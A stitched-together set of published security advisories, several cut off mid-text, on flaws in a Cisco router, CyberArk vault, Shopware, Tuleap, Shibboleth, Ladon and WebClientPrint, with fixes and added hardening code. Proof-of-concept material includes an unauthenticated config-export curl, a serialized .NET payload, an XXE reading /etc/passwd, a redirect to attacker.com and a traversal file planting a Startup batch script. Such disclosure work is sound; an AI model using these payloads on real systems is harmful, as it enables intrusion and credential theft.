"Keep your employees, your business, and yourself productive and effective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal choice for any small office or small business looking for performance, security, and reliability in its network."
(from the Cisco RV320 product page [1])

More Details
============

The Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based configuration interface. In the device's firmware, this functionality is implemented using a variety of CGI programs. Access to this web interface requires prior authentication using a username and password. RedTeam Pentesting discovered the CGI program:

/cgi-bin/config.exp

This program can be used to export the router's configuration. In contrast to other functions, this CGI program does not require any form of authentication. It may be accessed through the router's web server, which is available from the LAN by default. As described in [2], firmware versions from 1.4.2 to 1.4.2.15 (inclusive) also expose the web server to the WAN on TCP port 8007.
Proof of Concept
================

A device's configuration can be retrieved by issuing an HTTP GET request to the vulnerable CGI program (output shortened):

$ curl -s http://192.168.1.1/cgi-bin/config.exp
sysconfig
[VERSION]
VERSION=73
MODEL=RV320
SSL=0
IPSEC=0
PPTP=0
PLATFORMCODE=RV0XX
[...]
[SYSTEM]
HOSTNAME=router
DOMAINNAME=example.com
DOMAINCHANGE=1
USERNAME=cisco
PASSWD=066bae9070a9a95b3e03019db131cd40
[...]

Workaround
==========

Prevent untrusted clients from connecting to the device's web server.

Fix
===

Install firmware version 1.4.2.19 (or later) on the router.

Security Risk
=============

This vulnerability is rated as a high risk as it exposes the device's configuration to untrusted, potentially malicious parties. By downloading the configuration, attackers can obtain the internal network configuration, VPN or IPsec secrets, as well as password hashes for the router's user accounts. Knowledge of a user's password hash is sufficient to log into the router's web interface. Any information obtained through exploitation of this vulnerability can be used to facilitate further compromise of the device itself or attached networks.

Timeline
========

2018-09-19 Vulnerability identified
2018-09-27 Customer approved disclosure to vendor
2018-09-28 Vendor notified
2018-10-05 Receipt of advisory acknowledged by vendor
2018-10-05 Notified vendor of disclosure date: 2019-01-09
2018-11-18 List of affected versions provided by vendor
2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor
2019-01-23 Advisory published

References
==========

[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html
[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801
[FD] [RT-SA-2017-015] CyberArk Password Vault Memory Disclosure
35f 7265 636f 7264 7300 2968 b8fb aae9 s_records.)h
0110: 62

Starting at offset 0xe0, the vault discloses a total of 49 bytes of its memory to the client.

Workaround
==========

None

Fix
===

Upgrade CyberArk Password Vault to version 9.7 or 10.

Security Risk
=============

This vulnerability is rated as a high risk. Exploitation only requires network access to a PrivateArk Password Vault. Although each request only discloses about 50 bytes of memory, sustained exploitation will likely reveal sensitive information at some point in time. This critically undermines the primary purpose of the PrivateArk Password Vault.

Timeline
========

2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released
[FD] [RT-SA-2017-014] CyberArk Password Vault Web Access Remote Code Execution
wgU3lz
dGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49
Yjc3YTVjNTYxOTM0ZTA4OV1dBgwAAABLbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs
dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CgYNSVN5
c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2Vu
PWI3N2E1YzU2MTkzNGUwODkGDgAAABpTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcwYP
BVN0YXJ0CRAECQAAAC9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXph
dGlvbkhvbGRlcgcETmFtZQxBc3NlbWJseU5hbWUJQ2xhc3NOYW1lCVNpZ25hdHVyZQpT
aWduYXR1cmUyCk1lbWJlclR5cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEBAAMIDVN5c3RlbS5U
eXBlW10JDwkNCQ4GFD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBT
dGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYVPlN5c3RlbS5EaWFnbm9z
dGljcy5Qcm9jZXNzIFN0YXJ0KFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAoB
CgkGFgdDb21wYXJlCQwGGA1TeXN0ZW0uU3RyaW5nBhkrSW50
MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQYaMlN5c3RlbS5J
bnQzMiBDb21wYXJlKFN5c3RlbS5TdHJpbmcsIFN5c3RlbS5TdHJpbmcpCAoBEAgA
AAAGGwAAAHFTeXN0ZW0uQ29tcGFyaXNvbmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwg
VmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1
YzU2MTkzNGUwODldXQkMCgkMCRgJFgoL

Next, an API call is invoked which includes the malicious .NET object in its authorization header. This is done with cURL [3] as follows:

$ curl -s -X GET -k \
    --url 'https://10.0.0.6/PasswordVault/WebServices/PIMServices.svc/'\
'Applications/?Location=\&IncludeSublocations=true' \
    --header "authorization: $(cat execute-ping.txt)" \
    --header 'content-type: application/json'

Simultaneously, tcpdump [4] is invoked on the host 10.0.0.19 to listen for ICMP packets originating from the web server:

$ sudo tcpdump -i enp0s25 icmp
tcpdump: verbose output suppressed[...]
listening on enp0s25[...]
IP 10.0.0.6 > 10.0.0.19: ICMP echo request, id 1, seq 6, length 40
IP 10.0.0.19 > 10.0.0.6: ICMP echo reply, id 1, seq 6, length 40

The fact that ICMP packets are received from the web server indicates that attacker-controlled code was executed.
Workaround
==========

Disable any access to the API at the route /PasswordVault/WebServices.

Fix
===

Upgrade CyberArk Password Vault Web Access to version 9.9.5, 9.10 or 10.2.

Security Risk
=============

The risk of this vulnerability is rated as high. Attackers with access to the PrivateArk Vault Web Access REST API may execute arbitrary code on the web server. No credentials are required. Attackers gain access to the system with the privileges of the web application. Consequently, such access may be used to backdoor the web application and compromise further accounts and credentials. Additionally, attackers may pivot from the web server to attack the vault directly.

Timeline
========

2017-11-24 Vulnerability identified
2018-01-22 Customer approved disclosure to vendor
2018-02-05 Vendor notified
2018-02-28 Vendor released fixed version
2018-04-06 CVE number requested
2018-04-07 CVE number assigned
2018-04-09 Advisory released

References
==========

[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf
[2] https://github.com/pwntester/ysoserial.net
[3] https://curl.haxx.se/
[4] https://www.tcpdump.org/
[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites
Advisory: Shopware Cart Accessible by Third-Party Websites

RedTeam Pentesting discovered that the shopping cart implemented by Shopware offers an insecure API. Malicious, third-party websites may abuse this API to list, add or remove products from a user's cart.

Details
=======

Product: Shopware
Affected Versions: 4.0.1 - 5.3.7
Fixed Versions: > 5.4.0
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: https://shopware.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform."
(from the Shopware GitHub repository [1])

More Details
============

The Shopware web application provides users with a virtual shopping cart to collect products prior to checkout. This cart is displayed to the user as a modal sidebar appearing at the right edge of the browser window. Consequently, Shopware implements several API endpoints to allow JavaScript code to perform shopping cart operations. These endpoints are implemented in the "Shopware_Controllers_Frontend_Checkout" class and can be reached through the following paths:

* /checkout/ajaxCart
* /checkout/ajaxAddArticleCart
* /checkout/ajaxDeleteArticleCart

RedTeam Pentesting discovered that these API endpoints support JSONP when a URL parameter named "callback" is specified. Because the response is then delivered as JavaScript, any website can load it via a <script> element, which is not subject to the same-origin restrictions that apply to ordinary XMLHttpRequest responses. The origin of calls to the cart API is not validated. Therefore, any third-party website may make use of this API.
If a customer of a Shopware shop visits a malicious, attacker-controlled website, JavaScript code on this site may access the user's shopping cart.

Proof of Concept
================

The following JavaScript snippets demonstrate how to access the cart of a Shopware shop at "https://example.net" from a third-party website. The "getJSON" function of jQuery 3 is used to interface with the JSONP API. By running the following code, the contents of a cart may be retrieved. The result of the API call is displayed on the browser's developer console.

$.getJSON("https://example.net/checkout/ajaxCart?callback=?")
    .done(console.log);

The following code adds a new product to the cart. In this case, two instances of product 1234 are added.

$.getJSON(
    "https://example.net/checkout/ajaxAddArticleCart"+
    "?callback=?&sAdd=1234&sQuantity=2"
).done(console.log);

To remove a product from a user's shopping cart, attackers may use the following code. An id for the "sDelete" parameter may be obtained through a prior call to ajaxCart.

$.getJSON(
    "https://example.net/checkout/ajaxDeleteArticleCart"+
    "?callback=?&sDelete=4321"
).done(console.log);

Workaround
==========

Support for JSONP should be removed from the cart AJAX API. This ensures that only JavaScript code from the same origin may access the API and, respectively, the cart's contents. Furthermore, operations which change the state of the cart, i.e. adding and removing products, must be protected with CSRF tokens.

Fix
===

Upgrade to Shopware newer than 5.4.0.

Security Risk
=============

This vulnerability is rated as a low risk. Disclosure of a user's shopping cart to attackers may negatively impact the user's privacy. Furthermore, competing eCommerce sites may use this information to improve sales. By adding or removing products from a user's cart, attackers can negatively impact a user's shopping experience and create support effort for the shop operator.
Timeline
========

2017-08-28 Vulnerability identified
2017-09-13 Customer approved disclosure to vendor
2017-09-14 Vendor notified
2018-02-27 Vendor released fixed version
2018-03-13 Advisory released

References
==========

[1] https://github.com/shopware/shopware
[2] https://community.shopware.com/Downloads_cat_448.html#5.4.0
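The server-side behaviour described in this advisory and its workaround, as an added example that is not Shopware's code: `jsonp_endpoint` reproduces a cart endpoint that wraps its reply in any caller-supplied "callback", which is what lets a <script> tag on a foreign origin read the cart; `hardened_endpoint` applies the workaround section above (no JSONP, XMLHttpRequest-only, a per-session CSRF token on the add/delete paths). Request parameters, headers and the session are plain dicts constructed for the demo; SHOP_ORIGIN and the "__csrf_token" parameter name are assumptions.

```python
"""JSONP cart endpoint (vulnerable) beside a hardened handler.
Added example; not Shopware's code. Request/session objects are constructed."""
import hmac
import json
import secrets

SHOP_ORIGIN = "https://example.net"   # assumed origin of the shop itself
CART_PATH = "/checkout/ajaxCart"
MUTATING_PATHS = {"/checkout/ajaxAddArticleCart", "/checkout/ajaxDeleteArticleCart"}


def new_session():
    """Server-side session with an unguessable CSRF token that the shop's own
    pages embed for their JavaScript (constructed for the demo)."""
    return {"csrf_token": secrets.token_urlsafe(32), "cart": {}}


def jsonp_endpoint(params, cart):
    """Vulnerable: with ?callback=f the cart comes back as f({...}) served as
    JavaScript, so <script src="https://shop/checkout/ajaxCart?callback=f"> on
    any origin hands the cart contents to the attacker's function f."""
    body = json.dumps(cart)
    callback = params.get("callback")
    if callback:
        return 200, "application/javascript", "%s(%s);" % (callback, body)
    return 200, "application/json", body


def _deny():
    return 403, "application/json", json.dumps({"error": "forbidden"})


def hardened_endpoint(method, path, params, headers, session):
    """Workaround from the advisory. Three independent checks:
    1. The reply is always plain JSON (the "callback" parameter is ignored), so
       a cross-origin <script> load yields nothing executable.
    2. Only XMLHttpRequest calls are served: <form> and <script> cannot set the
       X-Requested-With header, and a browser only sends it cross-origin after
       a CORS preflight, which this handler never approves.
    3. Add/delete require POST plus the session's CSRF token, compared in
       constant time."""
    if headers.get("X-Requested-With") != "XMLHttpRequest":
        return _deny()
    origin = headers.get("Origin")
    if origin is not None and origin != SHOP_ORIGIN:
        return _deny()

    cart = session["cart"]
    if path in MUTATING_PATHS:
        token = params.get("__csrf_token", "")
        if method != "POST" or not hmac.compare_digest(
                token.encode(), session["csrf_token"].encode()):
            return _deny()
        if path.endswith("AddArticleCart"):
            number = params["sAdd"]
            cart[number] = cart.get(number, 0) + int(params.get("sQuantity", "1"))
        else:
            cart.pop(params["sDelete"], None)
    elif path != CART_PATH:
        return 404, "application/json", json.dumps({"error": "not found"})

    return 200, "application/json", json.dumps(cart)


if __name__ == "__main__":
    session = new_session()
    print(jsonp_endpoint({"callback": "leak"}, {"1234": 2}))
    xhr = {"X-Requested-With": "XMLHttpRequest", "Origin": SHOP_ORIGIN}
    print(hardened_endpoint("GET", CART_PATH, {"callback": "leak"}, {}, session))
    print(hardened_endpoint("POST", "/checkout/ajaxAddArticleCart",
                            {"sAdd": "1234", "sQuantity": "2",
                             "__csrf_token": session["csrf_token"]}, xhr, session))
```

Removing JSONP is the decisive change: once the cart is only ever returned as JSON, the attacker's page can still trigger the request but can no longer read the reply; the header and token checks then stop the state-changing requests that cannot be blocked by the same-origin policy alone.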
[FD] [RT-SA-2018-001] Arbitrary Redirect in Tuleap
Advisory: Arbitrary Redirect in Tuleap

RedTeam Pentesting discovered an arbitrary redirect vulnerability in the redirect mechanism of the application lifecycle management platform Tuleap.

Details
=======

Product: Tuleap
Affected Versions: < 9.17.99.93
Fixed Versions: >= 9.17.99.93
Vulnerability Type: Arbitrary Redirect
Security Risk: low
Vendor URL: https://www.tuleap.org/
Vendor Status: fixed version released
Vendor Issue URL: https://tuleap.net/plugins/tracker/?aid=11136
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"Tuleap is an open source tool for Scrum, Kanban, waterfall, requirement management. Plan, track, code and collaborate on software projects, you get everything at hand."
(from the Tuleap website [1])

More Details
============

RedTeam Pentesting discovered an arbitrary redirect vulnerability in the way Tuleap handles redirects. Usually this function is only used in Tuleap after a successful login to redirect to assigned trackers, however the redirect can be used independently of whether a user is authenticated to the application. While the application employs a URL filter to prevent arbitrary redirects, the URL filter can be bypassed. This allows attackers to redirect users to a different website if a user opens an attacker-prepared URL.

The filter can be bypassed by using protocol-relative URLs, which omit the leading protocol identifier. Such URLs start with two slashes, which instructs the browser to use the same protocol as the current page and to treat the text after the slashes as the host. This behaviour is specified in RFC 3986 [2]: section 4.2 defines these "network-path references", and section 5.4 shows how "//g" resolves to "http://g" against an http base URL.

Proof of Concept
================

The following URL to an example installation of Tuleap will redirect users to an attacker-controlled website:

https://example.net/my/redirect.php?return_to=//attacker.com

Workaround
==========

Currently no workaround is known.

Fix
===

Upgrade to at least Tuleap version 9.17.99.93.
Security Risk
=============

Attackers may convince users to use a prepared link to access a valid Tuleap instance, which then redirects users to a fake login page. This can greatly increase the effectiveness of phishing attacks and may allow attackers to steal user credentials more effectively. However, no credentials or sensitive information can be extracted directly. Furthermore, the website to which users are redirected will be displayed in the browser's location bar, so that users may identify the attack. Therefore, we rate this vulnerability as a low risk. Nevertheless, it is very easy for attackers to identify this vulnerability and create malicious URLs, which makes it very likely that attackers will abuse it.

Timeline
========

2018-01-02 Vulnerability identified
2018-01-11 Customer approved disclosure to vendor
2018-02-13 Vendor notified
2018-02-14 Vendor released fixed version
2018-03-05 Vendor made issue public
2018-03-08 Advisory released

References
==========

[1] https://www.tuleap.org/what-is-tuleap
[2] https://tools.ietf.org/html/rfc3986
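The filter bypass from this advisory and a validator that closes it, as an added example (Tuleap's own filter is not shown on the page; `naive_is_local` is a constructed stand-in for a check that only looks for an explicit scheme). `safe_is_local` accepts nothing but path-absolute references, which is the only class of `return_to` value a browser cannot turn into a different host: it rejects network-path references ("//host"), any scheme, the backslash variant ("/\host", which Chromium normalises to "//host") and control characters. Function names and the "/my/" default are assumptions.

```python
"""Open-redirect validation: the "//attacker.com" bypass and a strict check.
Added example; not Tuleap's code. naive_is_local is a constructed stand-in."""
from urllib.parse import urlsplit


def naive_is_local(url):
    """Constructed stand-in for a filter that only blocks explicit schemes.
    A network-path reference carries no scheme, so it passes untouched."""
    return not url.lower().startswith(("http://", "https://"))


def safe_is_local(url):
    """Accept only path-absolute references such as "/my/?foo=1".

    Rejected: empty values, anything not starting with "/", network-path
    references ("//host"), the backslash variant ("/\\host"), any value that
    urlsplit still sees as carrying a scheme or authority, and control
    characters (CR/LF/TAB), which some parsers strip before resolving."""
    if not url or not url.startswith("/") or url.startswith(("//", "/\\")):
        return False
    if any(ord(c) < 0x20 or c == "\\" for c in url):
        return False
    parts = urlsplit(url)
    return parts.scheme == "" and parts.netloc == ""


def resolve_return_to(return_to, default="/my/"):
    """Server-side decision for the redirect target: use the validated value
    or fall back to a fixed in-application path (assumed default)."""
    return return_to if safe_is_local(return_to) else default


if __name__ == "__main__":
    for candidate in ["/my/?foo=1", "//attacker.com", "/\\attacker.com",
                      "https://attacker.com", "javascript:alert(1)", "/\r\n//x"]:
        print("%-22r naive=%-5s safe=%-5s -> %s" % (
            candidate, naive_is_local(candidate), safe_is_local(candidate),
            resolve_return_to(candidate)))
```

The naive check lets "//attacker.com" through because it never contains "http://"; the strict check passes only the first candidate. Validating the destination (allow-list of local paths) is preferable to trying to enumerate bad prefixes, which is exactly the approach the advisory shows being bypassed.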
[FD] [RT-SA-2017-013] Truncation of SAML Attributes in Shibboleth 2
aced with "&s;taf&f1;".

After these modifications, the XML document is re-inserted into the HTTP POST request which is then sent to the service provider. The SAML response is accepted by the service provider. Due to the vulnerability, the service provider application reports "taf" as the value of the "uid" attribute.

Workaround
==========

The use of XML encryption can serve as a mitigation for this vulnerability but may still allow attacks in certain scenarios.

Fix
===

Manually update to the latest version [4] as described in the security advisory published by Shibboleth [5]. Alternatively, use the operating system's package management to receive the update [6].

Furthermore, a new version of the XMLTooling-C library (1.6.3) has been released to address this vulnerability. DTD processing is now disabled in the XML parser. Yet, some platforms ship with old parser versions that do not allow DTD processing to be disabled, namely Red Hat and CentOS. Therefore, the "unmarshallContent" function has also been hardened to mitigate the vulnerability on these platforms.

Security Risk
=============

The key feature of Shibboleth, secure transfer of assertions, is compromised. Therefore, the vulnerability is rated as a high risk. In certain circumstances, this might lead to a complete bypass of authorisation mechanisms.

In practice, the risk for service providers is highly dependent on the actual deployment of the Shibboleth infrastructure: sometimes, SAML responses are encrypted or not transferred through a browser. In this case, an attacker is not able to insert XML entities. Whether truncating SAML attribute values is profitable for attackers also depends on the actual use and structure of these values. Attackers may use an application's self-service features to change their account's email to a manipulated but valid address. Truncation of this email address in a SAML response could lead to access to further accounts, effectively bypassing authorisation mechanisms.
Timeline
========

2017-11-06 Vulnerability identified
2017-11-13 Customer approved further research
2017-12-01 Further research conducted
2018-01-09 Customer approved disclosure to vendor
2018-01-10 Vendor notified
2018-01-12 Vendor released fixed version
2018-01-15 Advisory released

References
==========

[1] https://www.shibboleth.net/
[2] https://www.w3.org/TR/xmldsig-core/
[3] https://github.com/UniconLabs/dockerized-idp-testbed
[4] https://shibboleth.net/downloads/service-provider/2.6.1/
[5] https://shibboleth.net/community/advisories/secadv_20180112.txt
[6] https://security-tracker.debian.org/tracker/CVE-2018-0486
[FD] [RT-SA-2016-008] XML External Entity Expansion in Ladon Webservice
schemas.xmlsoap.org/soap/encoding/\";> &passwd; ' \
  'http://localhost:/HelloService/soap11' | xmllint --format -
---

The server answers with a response containing the passwd file:

---
http://schemas.xmlsoap.org/soap/encoding/"; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"; xmlns:ns="urn:HelloService" xmlns:xsd="http://www.w3.org/2001/XMLSchema";>
http://schemas.xmlsoap.org/soap/encoding/";>
Hello root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:[...]
---

Workaround
==========

The Python package defusedxml [2] can be used to monkey patch the standard library's XML parsers so that DTDs, entity expansion and external entities are refused. The following workaround can be included in the code, which prevents exploitation:

---
[...]
import defusedxml
defusedxml.defuse_stdlib()
[...]
---

Fix
===

Currently no fix is available.

Security Risk
=============

Attackers are able to read local files on the server of the webservice with the privileges of the webservice. Furthermore, attackers are able to issue HTTP requests from the webservice to other services on the Internet or the local network. It is likely that attackers are able to gain access to credentials for database services used by the webservice. Attackers may also be able to cause a denial-of-service attack against the respective webservice. Depending on the data stored on the vulnerable system and the relevance of the webservice, this vulnerability may pose a high risk.
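Both the Shibboleth advisory above (entity references splitting one attribute value into several text nodes) and the Ladon XXE here come down to the same root cause: the parser accepts a DTD from the sender. The following Python example is added here and is not code from either advisory, from Shibboleth or from Ladon. It uses the standard library's expat parser with two constructed, deliberately simplified documents (element names and the toy unmarshaller are assumptions) to show how a value gets truncated when entity expansion splits the text, and how refusing the DOCTYPE up front, which is what `defusedxml.defuse_stdlib()` arranges for the standard library, stops both the truncation and the external-entity case before any entity is declared:

```python
import xml.parsers.expat

# Constructed sample modelled on the Shibboleth case: the attribute value
# "staff" is written as "&s;taf&f1;", with both entities declared in an
# internal DTD subset. Element names are simplified, not a real SAML response.
SPLIT_VALUE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE Response [
  <!ENTITY s "s">
  <!ENTITY f1 "f">
]>
<Response>
  <Attribute Name="uid"><AttributeValue>&s;taf&f1;</AttributeValue></Attribute>
</Response>
"""

# Constructed sample modelled on the Ladon case: an external entity that a
# resolving parser would replace with the contents of a local file.
XXE_DOC = b"""<?xml version="1.0"?>
<!DOCTYPE Response [
  <!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<Response>
  <Attribute Name="uid"><AttributeValue>&passwd;</AttributeValue></Attribute>
</Response>
"""


class DTDForbidden(Exception):
    """Raised when a document carries a DOCTYPE and DTDs are not allowed."""


def extract_uid(doc, *, first_chunk_only=False, forbid_dtd=False):
    """Return the text content of the first <AttributeValue> in doc.

    first_chunk_only=True models an unmarshaller that keeps only the first
    text node below the element. expat reports entity-expanded text in
    separate callbacks ("s", "taf", "f"), much as a DOM parser yields separate
    text and entity-reference nodes, so the value is silently truncated while
    the signed content still canonicalises to the original value and the
    signature verifies.

    forbid_dtd=True models the fix, and what defusedxml.defuse_stdlib() does
    for the standard library: abort at the DOCTYPE, before any entity can be
    declared, let alone resolved.
    """
    parser = xml.parsers.expat.ParserCreate()
    state = {"inside": False, "chunks": []}

    def start_doctype(name, sysid, pubid, has_internal_subset):
        if forbid_dtd:
            raise DTDForbidden(f"DOCTYPE {name!r} not allowed in this message")

    def start_element(name, attrs):
        if name == "AttributeValue":
            state["inside"] = True

    def end_element(name):
        if name == "AttributeValue":
            state["inside"] = False

    def character_data(data):
        if not state["inside"]:
            return
        if first_chunk_only and state["chunks"]:
            return  # the buggy path: every text node after the first is dropped
        state["chunks"].append(data)

    parser.StartDoctypeDeclHandler = start_doctype
    parser.StartElementHandler = start_element
    parser.EndElementHandler = end_element
    parser.CharacterDataHandler = character_data
    parser.Parse(doc, True)
    return "".join(state["chunks"])


def hardened_uid(doc):
    """The safe reading: refuse any DTD and concatenate all text chunks."""
    return extract_uid(doc, forbid_dtd=True)


if __name__ == "__main__":
    print("buggy unmarshaller:", extract_uid(SPLIT_VALUE_DOC, first_chunk_only=True))
    print("all text chunks   :", extract_uid(SPLIT_VALUE_DOC))
    for label, doc in (("split", SPLIT_VALUE_DOC), ("xxe", XXE_DOC)):
        try:
            hardened_uid(doc)
        except DTDForbidden as exc:
            print(f"hardened ({label}):", exc)
```

Concatenating every text chunk is the equivalent of the "unmarshallContent" hardening the Shibboleth advisory mentions for platforms whose parser cannot disable DTDs; rejecting the DOCTYPE is the stronger fix and also closes the XXE and entity-expansion denial-of-service cases that Ladon is exposed to.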
Timeline
========

2016-11-29 Vulnerability identified
2016-11-29 Customer notified vendor
2017-07-10 Customer fixed problem in their own product
2017-07-21 RedTeam Pentesting notified vendor
2017-08-11 RedTeam Pentesting asked vendor for status update
2017-09-08 RedTeam Pentesting asked vendor for status update and announced public release for end of October
2017-10-09 RedTeam Pentesting asked vendor for status update
2017-11-03 Advisory released (no reply from vendor to status update requests)

References
==========

[1] http://ladonize.org
[2] https://pypi.python.org/pypi/defusedxml
[FD] [RT-SA-2015-011] WebClientPrint Processor 2.0: No Validation of TLS Certificates
.

Workaround
==========

Affected users should disable the WCPP handler and upgrade to a fixed version as soon as possible.

Fix
===

Install a WCPP version greater or equal to 2.0.15.910 [0].

Security Risk
=============

WCPP does not verify TLS certificates when establishing HTTPS connections. Man-in-the-middle attackers can therefore intercept those connections with little effort. This may lead to a disclosure of confidential information if sensitive documents are printed via WCPP. Furthermore, the integrity of the printed documents cannot be guaranteed as attackers are able to modify the documents in transit. The described attack requires a man-in-the-middle position, which is a rather strong prerequisite. It is therefore estimated that the vulnerability poses a medium risk.

Timeline
========

2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released

References
==========

[0] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/
[1] http://www.dest-unreach.org/socat/
[FD] [RT-SA-2015-010] WebClientPrint Processor 2.0: Unauthorised Proxy Modification
ed
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released
[FD] [RT-SA-2015-009] WebClientPrint Processor 2.0: Remote Code Execution via Updates
migrating the malicious code to another place. This way, WCPP functionality would not be disrupted and the attacked users may be tricked to believe that a legitimate update has just occurred.

Because of the rarely fulfilled prerequisite of a browser running with elevated or administrative privileges, this vulnerability is estimated to pose a low risk.

Timeline
========

2015-08-24 Vulnerability identified
2015-09-03 Customer approved disclosure to vendor
2015-09-04 Asked vendor for security contact
2015-09-04 CVE number requested
2015-09-04 Vendor responded with security contact
2015-09-07 Vendor notified
2015-09-07 Vendor acknowledged receipt of advisory
2015-09-15 Vendor released fixed version
2015-09-16 Customer asked to wait with advisory release until all their clients are updated
2017-07-31 Customer approved advisory release
2017-08-22 Advisory released
[FD] [RT-SA-2015-008] WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs
MP% directory. Typically, this directory is located at:

C:\Users\\AppData\Local\Temp\

Proof of Concept
================

During RedTeam Pentesting's analysis of WCPP it was found that malicious CPJ files can be crafted that exploit a directory traversal bug in WCPP. Such an example is given in the following hexdump, showing the file rce-user.txt:

---
$ xxd rce-user.txt
0000: 6370 6a02 0201 0301 7763 7050            cpj.....wcpP
0010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c  F:..\..\Roaming\
0020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77  Microsoft\Window
0030: 735c 5374 6172 7420 4d65 6e75 5c50 726f  s\Start Menu\Pro
0040: 6772 616d 735c 5374 6172 7475 705c 5265  grams\Startup\Re
0050: 6454 6561 6d2e 6261 747c 4065 6368 6f20  dTeam.bat|@echo 
0060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d  off..cls..echo..
0070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43  .echo Proof-of-C
0080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d  oncept..echo ---
0090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65  -------------..e
00a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520  cho Remote Code 
00b0: 4578 6563 7574 696f 6e20 7669 6120 5765  Execution via We
00c0: 6243 6c69 656e 7450 7269 6e74 2076 322e  bClientPrint v2.
00d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c  0.15.109..FOR /L
00e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829   %%x IN (1,1,18)
00f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274   DO echo...start
0100: 2063 616c 630d 0a70 6175 7365 0d0a 007c   calc..pause...|
---

In this example the filename is set to

..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat

which is appended to the %TEMP% directory as follows:

C:\Users\\AppData\Local\Temp\..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat

After resolving the "..\..\" sequence contained in the filename, this yields the following path:

C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RedTeam.bat

As a consequence, the file content beginning at offset 0x5a is written to the file RedTeam.bat in the current user's Startup folder.
Therefore, RedTeam.bat will be executed once the affected user logs in again. As a proof of concept, a text will be displayed and Windows' calculator is executed.

On one hand, this exploit can be executed when the following URL is entered into the URL bar of a browser:

webclientprint:https://example.com/somedir/rce-user.txt

On the other hand, visiting users of a malicious website may be attacked without user interaction when the webclientprint URL is embedded into an iframe as follows:

---
<iframe src="webclientprint:https://example.com/somedir/rce-user.txt"></iframe>
---

The proof of concept printed above contains no valid license key, so a notification window is shown when the exploit is executed. However, this does not prevent successful exploitation. Attackers can easily add a valid license key (e.g. by buying a license), so the window is not shown and there is no visual indication of exploitation anymore.

The proof of concept is designed to print using the default printer. Since WCPP does not seem to know how to print batch files, it exits silently with the result that a successful attack does not print the batch file.

Workaround
==========

Affected users should disable the WCPP handler and upgrade to a fixed version as soon as possible.

Fix
===

Install a WCPP version greater or equal to 2.0.15.910 [1].

Security Risk
=============

If a user of WCPP visits an attacker-controlled website, arbitrary code can be executed on the attacked user's computer. If a valid license key is provided, there is no visual indication of the ongoing attack. Furthermore, no user interaction is required to trigger the vulnerability once a malicious website is visited. It is therefore estimated that this vulnerability poses a high risk.
